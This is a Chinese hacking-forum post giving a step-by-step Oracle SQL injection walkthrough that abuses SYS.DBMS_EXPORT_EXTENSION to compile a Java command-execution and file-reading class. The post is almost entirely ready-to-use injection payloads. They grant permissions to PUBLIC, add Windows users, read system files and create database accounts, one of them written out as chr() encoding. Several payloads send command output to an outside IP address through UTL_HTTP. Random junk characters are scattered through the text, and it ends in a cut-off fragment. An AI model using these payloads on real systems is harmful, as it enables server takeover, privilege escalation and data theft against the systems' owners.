找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2301|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 0 D: @- H3 A7 v. ^
4 r, U* A( A; X& g" m) @" L
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) & s+ a2 q5 u# q" K
的形式即可。(用" 'a'|| "是为了让语句返回true值) 4 m/ x$ m) y8 t. A
语句有点长,可能要用post提交。
+ @9 [3 ~3 h3 e0 c4 c以下是各个步骤: 7 V% N9 h7 _/ C1 u7 D2 ^; N! K! V
1.创建包
) e, ?+ T3 {$ Z6 ~) O3 d9 f通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:7 o1 k, I. B- ~$ i- b- ^! s4 S  Y! L
/xxx.jsp?id=1 and '1'<>'a'||(
5 J- f2 D; w2 M! x/ v% L0 qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  m% h- n+ p" f0 _+ bcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 L' C- g" }) c' x( A7 M, y7 Vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. L; l4 O" w( W7 V, O/ y/ Y. V}'''';END;'';END;--','SYS',0,'1',0) from dual
8 ?1 q8 n$ `; R- D& `2 L% g)
8 p0 G. T6 H! l. y, a------------------------ 9 _+ f* M1 g7 s, [+ U" g0 @5 F' T
如果url有长度限制,可以把readFile()函数块去掉,即:
) j9 A3 I- W$ S5 N/xxx.jsp?id=1 and '1'<>'a'||(
+ G8 [. W; S& x4 c& Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: }& |9 u6 L5 r" acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(% H; X3 V  T" Q2 X* F
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
* X" I" h( T) [4 u+ M- I  v- M}'''';END;'';END;--','SYS',0,'1',0) from dual : E7 X4 `% T9 f& B: y
) 2 p4 [/ A7 o) G: `. U# j* Q
同时把后面步骤 提到的 对readFile()的处理语句去掉。
! j# l; |" b& g4 v" Z------------------------------
6 t- w) M5 y; ~2.赋Java权限
6 {: Z5 h# Z+ n( |3 M  [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3 P7 q+ [  ]9 a5 _3.创建函数 . h8 {: r$ M6 F% l6 K6 T7 M  Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 `& k2 q% m% n! z7 X& N* r8 Ocreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
6 S+ E5 {0 Q! tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 c+ y8 ~6 B" g5 u9 T# N
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual& w) ?" M) }4 ]1 X
4.赋public执行函数的权限
0 q9 \/ p) E- N  \. eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual. Q+ I( N. O" W! o2 @+ E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
  c3 }' v2 t5 x; v. f5.测试上面的几步是否成功
7 H: f8 J7 C% |and '1'<>'11'||( : ~1 Y. ~1 ~% ^. I
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
2 |$ F; k: I/ ?+ z, D$ y) ! O# j) z, |$ S$ t
and '1'<>( , U7 t% m) z% ?. U# f
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 1 R9 ]" K+ p. z6 T
)
  ^9 Z4 D6 S! T2 ^, q  C/ b6.执行命令: / K1 X0 M! b/ X: A7 X  K; ^
/xxx.jsp?id=1 and '1'<>( ; T/ W) @  v5 ?- `* _7 \
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 9 K9 C5 d2 M  t5 M5 t4 V

" C3 `( e' |3 ^' U7 X)
: X# t" ^7 [: |- ^/xxx.jsp?id=1 and '1'<>(
% u1 {) {9 B% o1 N( Hselect  sys.LinxReadFile('c:/boot.ini') from dual* M% x  d! s0 C5 ?) U; _6 x& `: ^
" N4 q% o5 M2 g4 L6 L5 p
)
: D' \7 Q6 d  v9 h4 D5 ^  
' a+ k5 d) p; y/ u: B8 K注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
4 H. M: Y$ A' |如果要查看运行结果可以用 union :
5 \9 ]0 h: C  z( D" H$ A6 N/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual- \- I5 T! Z& k0 t
或者UTL_HTTP.request(:
) g0 p9 Q2 _. X  S+ L) m9 \/xxx.jsp?id=1 and '1'<>(
: ~# T9 {; Q6 u+ E- k# gSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
7 h: Y$ Z/ V0 P9 P- {' H) 2 g/ U7 r  W! h1 i
/xxx.jsp?id=1 and '1'<>( 3 H" @+ m: n) l
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
/ @& @1 I9 e! v# g5 r$ k+ r5 e) 1 F2 G; b1 w' [6 q# z
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。. E+ o: N: q' W5 a1 _( q5 a1 x1 \
--------------------
9 U& N" ?" D, ~( H/ i6.内部变化
4 s  U" d" P  c0 ^* E通过以下命令可以查看all_objects表达改变: ! w# j& E/ r! `) j  X6 {
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%') ^$ V$ w3 \1 A3 u  ?$ q( Y/ I
7.删除我们创建的函数
& H& h. R2 l3 _  Y+ [: aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 j5 y1 @; ?  t9 Zdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
' J/ p& z/ ?. _5 ?2 i& c==================================================== + k7 |+ b' n2 P/ ]; R6 z
全文结束。谨以此文赠与我的朋友。
8 B" x) B9 ?: O/ ylinx
" f8 m- I. |  w: p124829445
+ L5 F' H5 R! M2008.1.12
/ _2 w& e" C. R2 k( c) _; }linyujian@bjfu.edu.cn 3 p% B) }, ^, F0 m
====================================================================== * c$ H+ |9 q1 `; O6 U) U# o/ h
测试漏洞的另一方法:
7 {& E3 y# c$ d3 k5 x创建oracle帐号:
. L7 ~. W( q( _) rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 G& ^$ a+ j' Q" K# x/ v$ S
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ |( x* t6 u. J, x4 E0 |3 D
即:
4 T, @4 T  }$ h* ]' @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
0 z0 o" Y% B2 n, S! Dchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
$ N" |* E8 L- M* t确定漏洞存在: ! \$ Y1 v& Q, x! q1 ^
1<>(
% N# _! |) |9 I* }+ q* L' vselect user_id from all_users where username='LINXSQL'
" F* |$ ]6 R/ ?5 ]# }0 J/ N) ?) ) g. v% v" p* U' R4 o1 L
给linxsql连接权限: ! d* t3 R* K$ t! k3 t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% c, d7 `1 i4 z& E' y
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! v4 K- F- y' N0 B  }8 Y5 d3 I' c删除帐号: / u3 a( y$ `1 S, M( n' ?/ J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ I3 n/ T0 I$ U5 Jdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
, D9 f4 ^; g, z# y7 |7 E8 e======================
5 m/ n1 i) p% e( `& z$ v以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:7 d* l/ j/ c9 h) y1 J) @- J
1.jsp?id=1 and '1'<>(
7 I3 h3 s# J+ ?# jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 Z4 I: K9 K; S  x7 h1 D1 t9 Screate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual' N# X7 A7 c% h9 ]7 c
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
# r+ T% r+ z7 E, ^ )
: `- A, M5 Y* t( Z0 U6 `9 D
$ D; e5 O9 i8 d+ C$ n2 v: U
0 |* E) @* b4 Q. q9 L
' c5 W" U4 ]) n" a7 E  f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表